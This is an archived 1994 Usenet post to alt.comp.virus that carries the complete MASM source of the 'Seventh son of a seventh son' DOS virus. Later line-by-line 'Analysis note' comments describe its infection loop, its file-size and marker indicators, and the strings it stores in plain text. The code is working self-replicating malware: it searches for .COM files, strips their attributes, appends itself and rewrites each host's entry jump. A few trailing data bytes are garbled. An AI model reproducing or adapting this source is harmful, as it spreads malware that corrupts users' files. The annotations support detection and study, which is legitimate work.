Assembly Source File  |  1994-11-29  |  7KB  |  252 lines

  1. From netcom.com!ix.netcom.com!netnews Tue Nov 29 09:42:48 1994
  2. Xref: netcom.com alt.comp.virus:506
  3. Path: netcom.com!ix.netcom.com!netnews
  4. From: Zeppelin@ix.netcom.com (Mr. G)
  5. Newsgroups: alt.comp.virus
  6. Subject: 7th Son Virus
  7. Date: 29 Nov 1994 13:02:59 GMT
  8. Organization: Netcom
  9. Lines: 236
  10. Distribution: world
  11. Message-ID: <3bf8q3$iaj@ixnews1.ix.netcom.com>
  12. References: <sbringerD00yHv.Hs3@netcom.com> <bradleymD011vJ.Lp8@netcom.com>
  13. NNTP-Posting-Host: ix-pas2-10.ix.netcom.com
  14.  
  15. ;***********************************************************************
  16. *****
  17. ;*  Seventh son of a seventh son    version 4
  18. ;*
  19. ;*  Compile with MASM 4.0
  20. ;*  (other assemblers will probably not produce the same result)
  21. ;*
  22. ;*  Disclaimer:
  23. ;*  This file is only for educational purposes. The author takes no
  24. ;*  responsibility for anything anyone does with this file. Do not
  25. ;*  modify this file!
  26. ;***********************************************************************
  27. *****
  28.  
  ;* Analysis note: segment setup and the size equates that bound which files
  ;* are modified. The infection loop only proceeds when the measured length is
  ;* above MINTARGET and below MAXTARGET, and it appends exactly FILELEN bytes,
  ;* so the size growth of an affected file is a fixed, checkable quantity.
  29. cseg            segment
  30.                 assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
  31.  
  32.                 .RADIX  16                      ;unsuffixed numeric literals below are read as hex
  33.  
  34. FILELEN         equ     end - start             ;number of bytes between start and end: the block appended to a host
  35. MINTARGET       equ     1000d                   ;lower size bound; tested with jbe, so lengths at or below it are skipped
  36. MAXTARGET       equ     -(FILELEN+40)           ;upper size bound; negative constant tested unsigned with jnb
  37.  
  38.  
  39.  
  40. ;***********************************************************************
  41. *****
  42. ;*              Dummy program (infected)
  43. ;***********************************************************************
  44. *****
  45.  
  ;* Analysis note: first four bytes of an affected .COM image as loaded at 0100h:
  ;* one marker byte, then a three-byte near jump. The infection loop writes the
  ;* same 4Dh, 0E9h pair into other files, so "4D E9 <16-bit length>" at file
  ;* offset 0 is a static indicator for this sample.
  46.                 org     100
  47.  
  48. begin:          db      4Dh                     ;virus mark (the byte the already-infected check compares against)
  49.                 db      0E9h, 4, 0              ;near jump, displacement 0004: passes over the 4 data bytes at start
  50.  
  51.  
  52. ;***********************************************************************
  53. *****
  54. ;*              Begin of the virus
  55. ;***********************************************************************
  56. *****
  57.  
  ;* Analysis note: entry sequence. It copies the four saved host bytes back to
  ;* 0100h, then changes three pieces of DOS state (ctrl-break flag, INT 24h
  ;* vector, DTA address) and pushes each old value so the code at stop: can put
  ;* it back. Addresses are formed as si + (label - 0104), where si holds the
  ;* run-time address of start, so the code does not depend on where it was appended.
  ;* Stack after this block, top first: name pointer, DTA offset, DTA segment,
  ;* 25xxh function word, INT 24h segment, INT 24h offset, 3301h, old break flag, 0100h.
  58. start:          db      0CDh,  20h, 0, 0        ;saved first 4 bytes of the host (in this dummy host: int 20h)
  59.  
  60.                 cld                             ;string moves below must run forward
  61.                 mov     si,0100h
  62.                 push    si                      ;0100h stays on the stack; the final ret at stop: returns to it
  63.                 mov     di,si
  64.                 add     si,[si+2]               ;si -> start (0100h + the jump displacement stored at 0102h)
  65.  
  66.                 push    si                      ;restore original begin: copy 4 bytes from start to 0100h
  67.                 movsw
  68.                 movsw
  69.                 pop     si
  70.  
  71.                 mov     ax,3300h                ;get ctrl-break flag
  72.                 int     21
  73.                 push    dx                      ;old flag value, restored at stop:
  74.  
  75.                 cwd                             ;clear the flag: dx = 0 while ax is positive
  76.                 inc     ax                      ;3300h -> 3301h (set flag), assuming DOS returned ax unchanged
  77.                 push    ax                      ;function word reused for the restore call at stop:
  78.                 int     21
  79.  
  80.                 mov     ax,3524h                ;get int24 vector
  81.                 int     21
  82.                 push    bx                      ;old handler offset
  83.                 push    es                      ;old handler segment
  84.  
  85.                 lea     dx,[si+(offset ni24 - 0104)]  ;set new int24 
  86. vector
  87.                 mov     ah,25h                  ;al is presumably still 24h from the previous call
  88.                 push    ax                      ;function word reused for the restore call at stop:
  89.                 int     21
  90.  
  91.                 mov     ah,2Fh                  ;get DTA address
  92.                 int     21
  93.                 push    es                      ;old DTA segment
  94.                 push    bx                      ;old DTA offset
  95.  
  96.                 add     dx,070h                 ;set new DTA address: ni24 + 70h, which appears to lie past the end label
  97.                 mov     ah,1Ah
  98.                 int     21
  99.                 add     dx,1Eh                  ;DTA + 1Eh is later passed to DOS as a file-name pointer
  100.                 push    dx
  101.  
  ;* Analysis note: generation bookkeeping and the only payload visible in this
  ;* listing, a text message printed through DOS function 09h when both counter
  ;* bytes equal 7. Afterwards the counter word is shifted: the old low byte
  ;* becomes the high byte and the low byte restarts at 1. The block ends by
  ;* loading the find-first arguments that the int 21 at infloop: consumes.
  102.                 lea     di,[si+(offset generation-0104)]  ;check 
  103. generation
  104.                 cmp     [di],0707h
  105.                 jne     verder
  106.  
  107.                 lea     dx,[di+2]               ;7th son of a 7th son! dx -> sontxt, 2 bytes after generation
  108.                 mov     ah,09h                  ;print '$'-terminated string
  109.                 int     21
  110.  
  111. verder:         mov     ax,[di]                 ;update generations
  112.                 xchg    ah,al                   ;old low byte moves to the high byte
  113.                 mov     al,1                    ;low byte restarts at 1
  114.                 mov     [di],ax
  115.  
  116.                 lea     dx,[di+33d]             ;find first COM-file: dx -> filename (2 counter bytes + 31 text bytes)
  117.                 xor     cx,cx                   ;search attribute mask 0
  118.                 mov     ah,4Eh
  ;* Analysis note: per-file loop. Observable effects on disk, as far as this
  ;* listing shows:
  ;*   - the search pattern is '*.COM' with no drive or path component;
  ;*   - attributes are set to 0 before the file is opened and before the
  ;*     marker and size checks, and no later call restores them, so files
  ;*     that are skipped also lose their attributes;
  ;*   - the file date and time are read and written back at return2:, so the
  ;*     timestamp does not change;
  ;*   - an affected file grows by FILELEN bytes and its first four bytes
  ;*     become 4Dh, 0E9h and the original length as a 16-bit word;
  ;*   - a short write of the appended block leaves extra bytes at the end of
  ;*     the file while the first four bytes stay as they were.
  119. infloop:        int     21                      ;find first (4Eh) on entry, find next (4Fh) on later passes
  120.                 pop     dx                      ;dx -> name pointer pushed earlier (scratch DTA + 1Eh)
  121.                 jc      stop                    ;carry set: no further match
  122.  
  123.                 push    dx                      ;keep the name pointer on the stack for the next pass
  124.  
  125.                 xor     cx,cx                   ;clear 
  126. read-only-arttribute
  127.                 mov     ax,4301                 ;set attributes to cx = 0; nothing later in the listing restores them
  128.                 int     21
  129.                 jc      return1
  130.  
  131.                 mov     ax,3D02h                ;open the file (access mode 2)
  132.                 int     21
  133.                 jc      return1
  134.                 xchg    bx,ax                   ;bx = file handle
  135.  
  136.                 mov     ax,5700h                ;get file date & time
  137.                 int     21
  138.                 push    cx                      ;time, written back at return2:
  139.                 push    dx                      ;date, written back at return2:
  140.  
  141.                 mov     cx,4                    ;read begin of file
  142.                 mov     dx,si                   ;buffer is start: the 4-byte slot the appended copy carries
  143.                 mov     ah,3fh
  144.                 int     21                      ;result of the read is not checked
  145.  
  146.                 cmp     byte ptr [si],4Dh       ;already infected or an 
  147. EXE?
  148.                 je      return2
  149.                 cmp     byte ptr [si],5Ah       ;or a weird EXE? (first byte 'Z')
  150.                 je      return2
  151.  
  152.                 mov     al,2                    ;go to end of file
  153.                 call    seek                    ;ax = low word of the new position; dx = si on return
  154.  
  155.                 cmp     ax,MAXTARGET            ;check length of file (unsigned compares)
  156.                 jnb     return2
  157.                 cmp     ax,MINTARGET
  158.                 jbe     return2
  159.  
  160.                 push    ax                      ;keep the original length across the write
  161.                 mov     cx,FILELEN              ;write program to end of 
  162. file
  163.                 mov     ah,40h
  164.                 int     21
  165.                 cmp     ax,cx                   ;are all bytes written?
  166.                 pop     ax
  167.                 jnz     return2                 ;short write: first four bytes are left untouched
  168.  
  169.                 xchg    ax,bp                   ;bp = original file length
  170.                 mov     al,0                    ;go to begin of file
  171.                 call    seek
  172.  
  173.                 mov     word ptr [si],0E94Dh    ;write mark and 
  174. jump-command
  175.                 mov     word ptr [si+2],bp      ;jump displacement = original file length
  176.                 mov     ah,40h
  177.                 int     21                      ;cl = 4 and dx = si as left by seek; result not checked
  178.  
  179.                 inc     byte ptr [di]           ;number of next son
  180.  
  181. return2:        pop     dx                      ;restore file date & 
  182. time
  183.                 pop     cx
  184.                 mov     ax,5701h
  185.                 int     21
  186.  
  187.                 mov     ah,3Eh                  ;close the file
  188.                 int     21
  189.  
  190. return1:        mov     ah,4Fh                  ;find next file
  191.                 jmp     short infloop
  192.  
  ;* Analysis note: exit path. Pops the values pushed by the entry sequence in
  ;* reverse order to restore the DTA address, the INT 24h vector and the
  ;* ctrl-break flag, reloads ds and es from cs, and returns to the 0100h
  ;* pushed at entry, where the host's original first bytes were copied back.
  ;* Nothing in this listing installs resident code or hooks a vector permanently.
  193. stop:           pop     dx                      ;restore DTA address: dx = old offset
  194.                 pop     ds                      ;ds = old DTA segment
  195.                 mov     ah,1Ah
  196.                 int     21
  197.  
  198.                 pop     ax                      ;restore int24 vector: ax = function word pushed at entry
  199.                 pop     ds                      ;ds = old handler segment
  200.                 pop     dx                      ;dx = old handler offset
  201.                 int     21
  202.  
  203.                 pop     ax                      ;restore ctrl-break flag: ax = 3301h pushed at entry
  204.                 pop     dx                      ;dl = flag value read at entry
  205.                 int     21
  206.  
  207.                 push    cs                      ;ds and es were repointed above; reset both to cs
  208.                 push    cs
  209.                 pop     ds
  210.                 pop     es
  211.  
  212.                 ret                             ;pops the 0100h pushed at entry
  213.  
  ;* Analysis note: file-pointer helper. In: al = seek origin, bx = handle.
  ;* Moves the pointer to offset 0 from that origin (cx:dx = 0:0). On return
  ;* ax holds the low word of the new position; dx is overwritten with si, so
  ;* the high word of the position is discarded, and cl is set to 4 so the
  ;* caller can issue a 4-byte write from si directly.
  ;* The int21: label is not referenced anywhere else in this listing.
  214. seek:           mov     ah,42
  215.                 cwd                             ;dx = 0 (ah = 42h keeps ax positive)
  216. int21:          xor     cx,cx
  217.                 int     21
  218.                 mov     cl,4                    ;cx was zeroed before the call; assumes DOS preserved it
  219.                 mov     dx,si
  220.                 ret
  221.  
  222.  
  223. ;***********************************************************************
  224. *****
  225. ;*              Interrupt handler 24
  226. ;***********************************************************************
  227. *****
  228.  
  ;* Analysis note: replacement critical-error handler installed for the
  ;* duration of the file loop. It returns al = 3 without any prompt, so a
  ;* failing disk operation (for example on write-protected media) produces no
  ;* visible DOS error dialogue while this code runs.
  229. ni24:           mov     al,03                   ;action code 3: fail the DOS call
  230.                 iret
  231.  
  232.  
  233. ;***********************************************************************
  234. *****
  235. ;*              Data
  236. ;***********************************************************************
  237. *****
  238.  
  ;* Analysis note: data carried at the tail of every appended copy. The
  ;* plain-text message and the '*.COM' pattern are stored unencoded, so both
  ;* are usable as static strings when scanning the last bytes of a .COM file.
  239. generation      db      1,1                     ;two counter bytes; the payload check compares the word with 0707h
  240. sontxt          db      'Seventh son of a seventh son',0Dh, 0Ah, '$'
  241. filename        db      '*.COM',0               ;search pattern passed to find-first
  242.                 db      'é¿░│▒'                 ;trailing bytes; original values are not recoverable from this rendering
  243.  
  244. end:                                            ;end of the appended block (FILELEN = end - start)
  245.  
  246. cseg            ends
  247.                 end     begin
  248.  
  249.  
  250.  
  251.  
  252.